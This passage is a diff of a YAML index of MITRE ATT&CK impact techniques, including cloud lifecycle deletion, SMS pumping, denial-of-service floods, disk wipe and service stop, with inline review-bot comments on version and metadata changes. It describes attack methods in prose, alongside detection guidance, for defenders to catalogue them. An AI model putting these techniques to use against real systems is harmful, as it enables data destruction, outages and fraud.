url: https://www.justice.gov/opa/pr/seven-iranians-working-islamic-revolutionary-guard-corps-affiliated-entities-charged
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1491.002:
technique:
@@ -113476,7 +114150,7 @@ impact:
description: 'Marco Balduzzi, Ryan Flores, Lion Gu, Federico Maggi, Vincenzo
Ciancaglini, Roel Reyes, Akira Urano. (n.d.). A Deep Dive into Defacement:
How Geopolitical Events Trigger Web Attacks. Retrieved April 19, 2019.'
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-25T19:34:37.539Z'
name: External Defacement
description: 'An adversary may deface systems external to an organization in
an attempt to deliver messaging, intimidate, or otherwise mislead an organization
@@ -113510,12 +114184,10 @@ impact:
- 'Network Traffic: Network Traffic Content'
x_mitre_impact_type:
- Integrity
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1499.001:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:51.289Z'
name: OS Exhaustion Flood
description: |-
Adversaries may launch a denial of service (DoS) attack targeting an endpoint's operating system (OS). A system's OS is responsible for managing the finite resources as well as preventing the entire system from being overwhelmed by excessive demands on its capacity. These attacks do not need to exhaust the actual resources on a system; the attacks may simply exhaust the limits and available resources that an OS self-imposes.
@@ -113580,42 +114252,127 @@ impact:
url: https://pages.arbornetworks.com/rs/082-KNA-087/images/13th_Worldwide_Infrastructure_Security_Report.pdf
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
atomic_tests: []
- T1499.003:
- technique:
- x_mitre_platforms:
- - Windows
- - Azure AD
- - Office 365
- - SaaS
- - IaaS
- - Linux
- - macOS
- - Google Workspace
+ T1485.001:
+ technique:
+ modified: '2024-10-16T21:27:02.481Z'
+ name: Lifecycle-Triggered Deletion
+ description: "Adversaries may modify the lifecycle policies of a cloud storage
+ bucket to destroy all objects stored within. \n\nCloud storage buckets often
+ allow users to set lifecycle policies to automate the migration, archival,
+ or deletion of objects after a set period of time.(Citation: AWS Storage Lifecycles)(Citation:
+ GCP Storage Lifecycles)(Citation: Azure Storage Lifecycles) If a threat actor
+ has sufficient permissions to modify these policies, they may be able to delete
+ all objects at once. \n\nFor example, in AWS environments, an adversary with
+ the `PutLifecycleConfiguration` permission may use the `PutBucketLifecycle`
+ API call to apply a lifecycle policy to an S3 bucket that deletes all objects
+ in the bucket after one day.(Citation: Palo Alto Cloud Ransomware) In addition
+ to destroying data for purposes of extortion and [Financial Theft](https://attack.mitre.org/techniques/T1657),
+ adversaries may also perform this action on buckets storing cloud logs for
+ [Indicator Removal](https://attack.mitre.org/techniques/T1070).(Citation:
+ Datadog S3 Lifecycle CloudTrail Logs)"
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: impact
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - IaaS
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'Cloud Storage: Cloud Storage Modification'
+ x_mitre_impact_type:
+ - Availability
+ type: attack-pattern
+ id: attack-pattern--1001e0d6-ee09-4dfc-aa90-e9320ffc8fe4
+ created: '2024-09-25T13:16:14.166Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1485/001
+ external_id: T1485.001
+ - source_name: AWS Storage Lifecycles
+ description: AWS. (n.d.). Managing the lifecycle of objects. Retrieved September
+ 25, 2024.
+ url: https://docs.aws.amazon.com/AmazonS3/latest/userguide/object-lifecycle-mgmt.html
+ - source_name: GCP Storage Lifecycles
+ description: Google Cloud. (n.d.). Object Lifecycle Management. Retrieved
+ September 25, 2024.
+ url: https://cloud.google.com/storage/docs/lifecycle
+ - source_name: Azure Storage Lifecycles
+ description: Microsoft Azure. (2024, July 3). Configure a lifecycle management
+ policy. Retrieved September 25, 2024.
+ url: https://learn.microsoft.com/en-us/azure/storage/blobs/lifecycle-management-policy-configure?tabs=azure-portal
+ - source_name: Palo Alto Cloud Ransomware
+ description: 'Ofir Balassiano and Ofir Shaty. (2023, November 29). Ransomware
+ in the Cloud: Breaking Down the Attack Vectors. Retrieved September 25,
+ 2024.'
+ url: https://www.paloaltonetworks.com/blog/prisma-cloud/ransomware-data-protection-cloud/
+ - source_name: Datadog S3 Lifecycle CloudTrail Logs
+ description: Stratus Red Team. (n.d.). CloudTrail Logs Impairment Through
+ S3 Lifecycle Rule. Retrieved September 25, 2024.
+ url: https://stratus-red-team.cloud/attack-techniques/AWS/aws.defense-evasion.cloudtrail-lifecycle-rule/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--18cffc21-3260-437e-80e4-4ab8bf2ba5e9
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
+ T1496.003:
+ technique:
+ modified: '2024-10-16T17:45:14.210Z'
+ name: SMS Pumping
+ description: |-
+ Adversaries may leverage messaging services for SMS pumping, which may impact system and/or hosted service availability.(Citation: Twilio SMS Pumping) SMS pumping is a type of telecommunications fraud whereby a threat actor first obtains a set of phone numbers from a telecommunications provider, then leverages a victim’s messaging infrastructure to send large amounts of SMS messages to numbers in that set. By generating SMS traffic to their phone number set, a threat actor may earn payments from the telecommunications provider.(Citation: Twilio SMS Pumping Fraud)
+
+ Threat actors often use publicly available web forms, such as one-time password (OTP) or account verification fields, in order to generate SMS traffic. These fields may leverage services such as Twilio, AWS SNS, and Amazon Cognito in the background.(Citation: Twilio SMS Pumping)(Citation: AWS RE:Inforce Threat Detection 2024) In response to the large quantity of requests, SMS costs may increase and communication channels may become overwhelmed.(Citation: Twilio SMS Pumping)
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: impact
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - SaaS
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'Application Log: Application Log Content'
+ x_mitre_impact_type:
+ - Availability
type: attack-pattern
- created: '2020-02-20T15:35:00.025Z'
+ id: attack-pattern--130d4494-b2d6-4040-bcea-6e59f05222fe
+ created: '2024-09-25T13:53:19.586Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1499.003
- url: https://attack.mitre.org/techniques/T1499/003
- - source_name: Arbor AnnualDoSreport Jan 2018
- url: https://pages.arbornetworks.com/rs/082-KNA-087/images/13th_Worldwide_Infrastructure_Security_Report.pdf
- description: Philippe Alcoy, Steinthor Bjarnason, Paul Bowen, C.F. Chui, Kirill
- Kasavchnko, and Gary Sockrider of Netscout Arbor. (2018, January). Insight
- into the Global Threat Landscape - Netscout Arbor's 13th Annual Worldwide
- Infrastructure Security Report. Retrieved April 22, 2019.
- - source_name: Cisco DoSdetectNetflow
- url: https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf
- description: Cisco. (n.d.). Detecting and Analyzing Network Threats With NetFlow.
- Retrieved April 25, 2019.
- modified: '2022-05-11T14:00:00.188Z'
+ url: https://attack.mitre.org/techniques/T1496/003
+ external_id: T1496.003
+ - source_name: AWS RE:Inforce Threat Detection 2024
+ description: Ben Fletcher and Steve de Vera. (2024, June). New tactics and
+ techniques for proactive threat detection. Retrieved September 25, 2024.
+ url: https://reinforce.awsevents.com/content/dam/reinforce/2024/slides/TDR432_New-tactics-and-techniques-for-proactive-threat-detection.pdf
+ - source_name: Twilio SMS Pumping
+ description: Twilio. (2024, April 10). What Is SMS Pumping Fraud and How to
+ Stop It. Retrieved September 25, 2024.
+ url: https://www.twilio.com/en-us/blog/sms-pumping-fraud-solutions
+ - source_name: Twilio SMS Pumping Fraud
+ description: Twilio. (n.d.). What is SMS Pumping Fraud?. Retrieved September
+ 25, 2024.
+ url: https://www.twilio.com/docs/glossary/what-is-sms-pumping-fraud
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
+ T1499.003:
+ technique:
+ modified: '2024-10-15T15:41:49.168Z'
name: Application Exhaustion Flood
description: 'Adversaries may target resource intensive features of applications
to cause a denial of service (DoS), denying availability to those applications.
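Review bot: this hunk interleaves the deletion of T1499.003's old top-of-object fields with the insertion of two new sub-techniques, T1485.001 (Lifecycle-Triggered Deletion) and T1496.003 (SMS Pumping), so the adjacent `-`/`+` pairs (for example `- T1499.003:` against `+ T1485.001:`, or `- created: '2020-02-20T15:35:00.025Z'` against `+ created: '2024-09-25T13:53:19.586Z'`) are not edits of the same field; T1499.003 is re-emitted at the end of the hunk with `modified: '2024-10-15T15:41:49.168Z'`. Both new entries ship with `x_mitre_detection: ''` and `atomic_tests: []`, so they add index rows without detection guidance or tests; that matches the upstream objects, but it is worth calling out, since the only detection hooks they carry are the data sources `'Cloud Storage: Cloud Storage Modification'` (T1485.001) and `'Application Log: Application Log Content'` (T1496.003).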
@@ -113626,13 +114383,20 @@ impact:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: impact
+ x_mitre_deprecated: false
x_mitre_detection: |-
Detection of Endpoint DoS can sometimes be achieved before the effect is sufficient to cause significant impact to the availability of the service, but such response time typically requires very aggressive monitoring and responsiveness. Typical network throughput monitoring tools such as netflow, SNMP, and custom scripts can be used to detect sudden increases in circuit utilization.(Citation: Cisco DoSdetectNetflow) Real-time, automated, and qualitative study of the network traffic can identify a sudden surge in one type of protocol can be used to detect an attack as it starts.
In addition to network level detections, endpoint logging and instrumentation can be useful for detection. Attacks targeting web applications may generate logs in the web server, application server, and/or database server that can be used to identify the type of attack, possibly before the impact is felt.
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.2'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ - IaaS
+ - Linux
+ - macOS
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Flow'
- 'Network Traffic: Network Traffic Content'
@@ -113640,12 +114404,33 @@ impact:
- 'Application Log: Application Log Content'
x_mitre_impact_type:
- Availability
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--18cffc21-3260-437e-80e4-4ab8bf2ba5e9
+ created: '2020-02-20T15:35:00.025Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1499/003
+ external_id: T1499.003
+ - source_name: Cisco DoSdetectNetflow
+ description: Cisco. (n.d.). Detecting and Analyzing Network Threats With NetFlow.
+ Retrieved April 25, 2019.
+ url: https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf
+ - source_name: Arbor AnnualDoSreport Jan 2018
+ description: Philippe Alcoy, Steinthor Bjarnason, Paul Bowen, C.F. Chui, Kirill
+ Kasavchnko, and Gary Sockrider of Netscout Arbor. (2018, January). Insight
+ into the Global Threat Landscape - Netscout Arbor's 13th Annual Worldwide
+ Infrastructure Security Report. Retrieved April 22, 2019.
+ url: https://pages.arbornetworks.com/rs/082-KNA-087/images/13th_Worldwide_Infrastructure_Security_Report.pdf
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1561:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-20T18:16:41.942Z'
name: Disk Wipe
description: |-
Adversaries may wipe or corrupt raw disk data on specific systems or in large numbers in a network to interrupt availability to system and network resources. With direct write access to a disk, adversaries may attempt to overwrite portions of disk data. Adversaries may opt to wipe arbitrary portions of disk data and/or wipe disk structures like the master boot record (MBR). A complete wipe of all disk sectors may be attempted.
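Review bot: the `modified` timestamp for T1561 moves backward in this hunk, from `'2023-05-09T14:00:00.188Z'` to `'2023-04-20T18:16:41.942Z'`; a regenerated index should never carry an earlier `modified` than the previous run unless it was built from a different or older STIX bundle, so confirm the bundle the generator pulled before merging. The hunk also drops `spec_version: '2.1'` from the T1499.003 object (every other object in the patch does the same) while `x_mitre_attack_spec_version` becomes 3.2.0; any consumer that reads `technique.spec_version` from this index will now find nothing.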
@@ -113706,109 +114491,79 @@ impact:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1565.001:
technique:
+ modified: '2024-08-26T16:33:33.982Z'
+ name: Stored Data Manipulation
+ description: |-
+ Adversaries may insert, delete, or manipulate data at rest in order to influence external outcomes or hide activity, thus threatening the integrity of the data.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating stored data, adversaries may attempt to affect a business process, organizational understanding, and decision making.
+
+ Stored data could include a variety of file formats, such as Office files, databases, stored emails, and custom file formats. The type of modification and the impact it will have depends on the type of data as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact.
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: impact
+ x_mitre_deprecated: false
+ x_mitre_detection: Where applicable, inspect important file hashes, locations,
+ and modifications for suspicious/unexpected values.
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
x_mitre_platforms:
- Linux
- macOS
- Windows
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_version: '1.1'
+ x_mitre_data_sources:
+ - 'File: File Modification'
+ - 'File: File Creation'
+ - 'File: File Deletion'
+ x_mitre_impact_type:
+ - Integrity
type: attack-pattern
id: attack-pattern--1cfcb312-b8d7-47a4-b560-4b16cc677292
created: '2020-03-02T14:22:24.410Z'
- x_mitre_version: '1.1'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1565.001
url: https://attack.mitre.org/techniques/T1565/001
+ external_id: T1565.001
- source_name: DOJ Lazarus Sony 2018
- url: https://www.justice.gov/opa/press-release/file/1092091/download
description: Department of Justice. (2018, September 6). Criminal Complaint
- United States of America v. PARK JIN HYOK. Retrieved March 29, 2019.
+ url: https://www.justice.gov/opa/press-release/file/1092091/download
- source_name: FireEye APT38 Oct 2018
- url: https://content.fireeye.com/apt/rpt-apt38
description: 'FireEye. (2018, October 03). APT38: Un-usual Suspects. Retrieved
November 6, 2018.'
- x_mitre_deprecated: false
- revoked: false
- description: |-
- Adversaries may insert, delete, or manipulate data at rest in order to influence external outcomes or hide activity, thus threatening the integrity of the data.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating stored data, adversaries may attempt to affect a business process, organizational understanding, and decision making.
-
- Stored data could include a variety of file formats, such as Office files, databases, stored emails, and custom file formats. The type of modification and the impact it will have depends on the type of data as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact.
- modified: '2022-05-11T14:00:00.188Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Stored Data Manipulation
- x_mitre_detection: Where applicable, inspect important file hashes, locations,
- and modifications for suspicious/unexpected values.
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: impact
- x_mitre_is_subtechnique: true
- x_mitre_data_sources:
- - 'File: File Modification'
- - 'File: File Creation'
- - 'File: File Deletion'
- x_mitre_impact_type:
- - Integrity
- x_mitre_attack_spec_version: 2.1.0
+ url: https://www.mandiant.com/sites/default/files/2021-09/rpt-apt38-2018-web_v5-1.pdf
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1489:
technique:
- x_mitre_platforms:
- - Windows
- - Linux
- - macOS
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- type: attack-pattern
- id: attack-pattern--20fb2507-d71c-455d-9b6d-6104461cf26b
- created: '2019-03-29T19:00:55.901Z'
- x_mitre_version: '1.2'
- external_references:
- - source_name: mitre-attack
- external_id: T1489
- url: https://attack.mitre.org/techniques/T1489
- - source_name: SecureWorks WannaCry Analysis
- url: https://www.secureworks.com/research/wcry-ransomware-analysis
- description: Counter Threat Unit Research Team. (2017, May 18). WCry Ransomware
- Analysis. Retrieved March 26, 2019.
- - source_name: Talos Olympic Destroyer 2018
- url: https://blog.talosintelligence.com/2018/02/olympic-destroyer.html
- description: Mercer, W. and Rascagneres, P. (2018, February 12). Olympic Destroyer
- Takes Aim At Winter Olympics. Retrieved March 14, 2019.
- - source_name: Novetta Blockbuster
- url: https://web.archive.org/web/20160226161828/https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Report.pdf
- description: 'Novetta Threat Research Group. (2016, February 24). Operation
- Blockbuster: Unraveling the Long Thread of the Sony Attack. Retrieved February
- 25, 2016.'
- x_mitre_deprecated: false
- revoked: false
+ modified: '2024-10-12T15:57:27.380Z'
+ name: Service Stop
description: "Adversaries may stop or disable services on a system to render
those services unavailable to legitimate users. Stopping critical services
or processes can inhibit or stop response to an incident or aid in the adversary's
overall objectives to cause damage to the environment.(Citation: Talos Olympic
Destroyer 2018)(Citation: Novetta Blockbuster) \n\nAdversaries may accomplish
this by disabling individual services of high importance to an organization,
- such as MSExchangeIS
, which will make Exchange content inaccessible
- (Citation: Novetta Blockbuster). In some cases, adversaries may stop or disable
- many or all services to render systems unusable.(Citation: Talos Olympic Destroyer
+ such as MSExchangeIS
, which will make Exchange content inaccessible.(Citation:
+ Novetta Blockbuster) In some cases, adversaries may stop or disable many or
+ all services to render systems unusable.(Citation: Talos Olympic Destroyer
2018) Services or processes may not allow for modification of their data stores
while running. Adversaries may stop services or processes in order to conduct
[Data Destruction](https://attack.mitre.org/techniques/T1485) or [Data Encrypted
for Impact](https://attack.mitre.org/techniques/T1486) on the data stores
of services like Exchange and SQL Server.(Citation: SecureWorks WannaCry Analysis)"
- modified: '2022-11-08T14:00:00.188Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Service Stop
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: impact
+ x_mitre_deprecated: false
x_mitre_detection: |-
Monitor processes and command-line arguments to see if critical processes are terminated or stop running.
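Review bot: the URL behind the `FireEye APT38 Oct 2018` reference changes host, from `https://content.fireeye.com/apt/rpt-apt38` to `https://www.mandiant.com/sites/default/files/2021-09/rpt-apt38-2018-web_v5-1.pdf`, while `source_name` and `description` stay the same; confirm it is the same report so `(Citation: FireEye APT38 Oct 2018)` in the T1565.001 description still resolves to the intended document. The remaining T1565.001 and T1489 changes are key reordering with unchanged values (`x_mitre_version`, `kill_chain_phases`, `external_references`) plus, in the T1489 description, the period moving in front of `(Citation: Novetta Blockbuster)`; the `MSExchangeIS` / `, which will make Exchange content inaccessible` split appears in both the removed and the added lines, so it is not something this patch introduces.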
@@ -113817,10 +114572,14 @@ impact:
Alterations to the service binary path or the service startup type changed to disabled may be suspicious.
Remote access tools with built-in features may interact directly with the Windows API to perform these functions outside of typical system utilities. For example, ChangeServiceConfigW
may be used by an adversary to prevent services from starting.(Citation: Talos Olympic Destroyer 2018)
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: impact
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Windows
+ - Linux
+ - macOS
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Process: Process Creation'
- 'Process: Process Termination'
@@ -113831,9 +114590,32 @@ impact:
- 'Service: Service Metadata'
x_mitre_impact_type:
- Availability
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--20fb2507-d71c-455d-9b6d-6104461cf26b
+ created: '2019-03-29T19:00:55.901Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1489
+ external_id: T1489
+ - source_name: SecureWorks WannaCry Analysis
+ description: Counter Threat Unit Research Team. (2017, May 18). WCry Ransomware
+ Analysis. Retrieved March 26, 2019.
+ url: https://www.secureworks.com/research/wcry-ransomware-analysis
+ - source_name: Talos Olympic Destroyer 2018
+ description: Mercer, W. and Rascagneres, P. (2018, February 12). Olympic Destroyer
+ Takes Aim At Winter Olympics. Retrieved March 14, 2019.
+ url: https://blog.talosintelligence.com/2018/02/olympic-destroyer.html
+ - source_name: Novetta Blockbuster
+ description: 'Novetta Threat Research Group. (2016, February 24). Operation
+ Blockbuster: Unraveling the Long Thread of the Sony Attack. Retrieved February
+ 25, 2016.'
+ url: https://web.archive.org/web/20160226161828/https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Report.pdf
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1489
atomic_tests:
- name: Windows - Stop service using Service Controller
@@ -114003,32 +114785,7 @@ impact:
elevation_required: true
T1499.004:
technique:
- x_mitre_platforms:
- - Windows
- - Azure AD
- - Office 365
- - SaaS
- - IaaS
- - Linux
- - macOS
- - Google Workspace
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--2bee5ffb-7a7a-4119-b1f2-158151b19ac0
- type: attack-pattern
- created: '2020-02-20T15:37:27.052Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1499.004
- url: https://attack.mitre.org/techniques/T1499/004
- - source_name: Sucuri BIND9 August 2015
- url: https://blog.sucuri.net/2015/08/bind9-denial-of-service-exploit-in-the-wild.html
- description: Cid, D.. (2015, August 2). BIND9 – Denial of Service Exploit
- in the Wild. Retrieved April 26, 2019.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2024-10-15T15:42:23.001Z'
name: Application or System Exploitation
description: "Adversaries may exploit software vulnerabilities that can cause
an application or system to crash and deny availability to users. (Citation:
@@ -114046,13 +114803,20 @@ impact:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: impact
+ x_mitre_deprecated: false
x_mitre_detection: Attacks targeting web applications may generate logs in the
web server, application server, and/or database server that can be used to
identify the type of attack. Externally monitor the availability of services
that may be targeted by an Endpoint DoS.
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.2'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ - IaaS
+ - Linux
+ - macOS
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'Sensor Health: Host Status'
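Review bot: the re-added `x_mitre_platforms` list for T1499.004 contains only Windows, IaaS, Linux and macOS, so against the list removed in the previous hunk the technique loses Azure AD, Office 365, SaaS and Google Workspace; that is a content change (matching the `x_mitre_version` bump from '1.2' to '1.3'), not a reorder, and any per-platform index derived from this field has to be regenerated in the same change so the platform CSVs and this YAML agree.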
@@ -114060,36 +114824,27 @@ impact:
- 'Network Traffic: Network Traffic Flow'
x_mitre_impact_type:
- Availability
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
- atomic_tests: []
- T1565.003:
- technique:
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--32ad5c86-2bcf-47d8-8fdc-d7f3d79a7490
type: attack-pattern
- created: '2020-03-02T14:30:05.252Z'
+ id: attack-pattern--2bee5ffb-7a7a-4119-b1f2-158151b19ac0
+ created: '2020-02-20T15:37:27.052Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1565.003
- url: https://attack.mitre.org/techniques/T1565/003
- - description: 'FireEye. (2018, October 03). APT38: Un-usual Suspects. Retrieved
- November 6, 2018.'
- url: https://content.fireeye.com/apt/rpt-apt38
- source_name: FireEye APT38 Oct 2018
- - source_name: DOJ Lazarus Sony 2018
- url: https://www.justice.gov/opa/press-release/file/1092091/download
- description: Department of Justice. (2018, September 6). Criminal Complaint
- - United States of America v. PARK JIN HYOK. Retrieved March 29, 2019.
- modified: '2022-05-11T14:00:00.188Z'
+ url: https://attack.mitre.org/techniques/T1499/004
+ external_id: T1499.004
+ - source_name: Sucuri BIND9 August 2015
+ description: Cid, D.. (2015, August 2). BIND9 – Denial of Service Exploit
+ in the Wild. Retrieved April 26, 2019.
+ url: https://blog.sucuri.net/2015/08/bind9-denial-of-service-exploit-in-the-wild.html
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
+ T1565.003:
+ technique:
+ modified: '2024-10-15T18:21:43.760Z'
name: Runtime Data Manipulation
description: |-
Adversaries may modify systems in order to manipulate the data as it is accessed and displayed to an end user, thus threatening the integrity of the data.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating runtime data, adversaries may attempt to affect a business process, organizational understanding, and decision making.
@@ -114098,11 +114853,17 @@ impact:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: impact
+ x_mitre_deprecated: false
x_mitre_detection: Inspect important application binary file hashes, locations,
and modifications for suspicious/unexpected values.
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'File: File Modification'
- 'File: File Deletion'
@@ -114111,17 +114872,31 @@ impact:
- 'File: File Creation'
x_mitre_impact_type:
- Integrity
- x_mitre_permissions_required:
- - User
- - Administrator
- - root
- - SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--32ad5c86-2bcf-47d8-8fdc-d7f3d79a7490
+ created: '2020-03-02T14:30:05.252Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1565/003
+ external_id: T1565.003
+ - source_name: DOJ Lazarus Sony 2018
+ description: Department of Justice. (2018, September 6). Criminal Complaint
+ - United States of America v. PARK JIN HYOK. Retrieved March 29, 2019.
+ url: https://www.justice.gov/opa/press-release/file/1092091/download
+ - source_name: FireEye APT38 Oct 2018
+ description: 'FireEye. (2018, October 03). APT38: Un-usual Suspects. Retrieved
+ November 6, 2018.'
+ url: https://www.mandiant.com/sites/default/files/2021-09/rpt-apt38-2018-web_v5-1.pdf
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1498.002:
technique:
- modified: '2023-03-30T21:01:41.052Z'
+ modified: '2024-10-15T16:04:34.495Z'
name: Reflection Amplification
description: |-
Adversaries may attempt to cause a denial of service (DoS) by reflecting a high-volume of network traffic to a target. This type of Network DoS takes advantage of a third-party server intermediary that hosts and will respond to a given spoofed source IP address. This third-party server is commonly termed a reflector. An adversary accomplishes a reflection attack by sending packets to reflectors with the spoofed address of the victim. Similar to Direct Network Floods, more than one system may be used to conduct the attack, or a botnet may be used. Likewise, one or more reflectors may be used to focus traffic on the target.(Citation: Cloudflare ReflectionDoS May 2017) This Network DoS attack may also reduce the availability and functionality of the targeted system(s) and network.
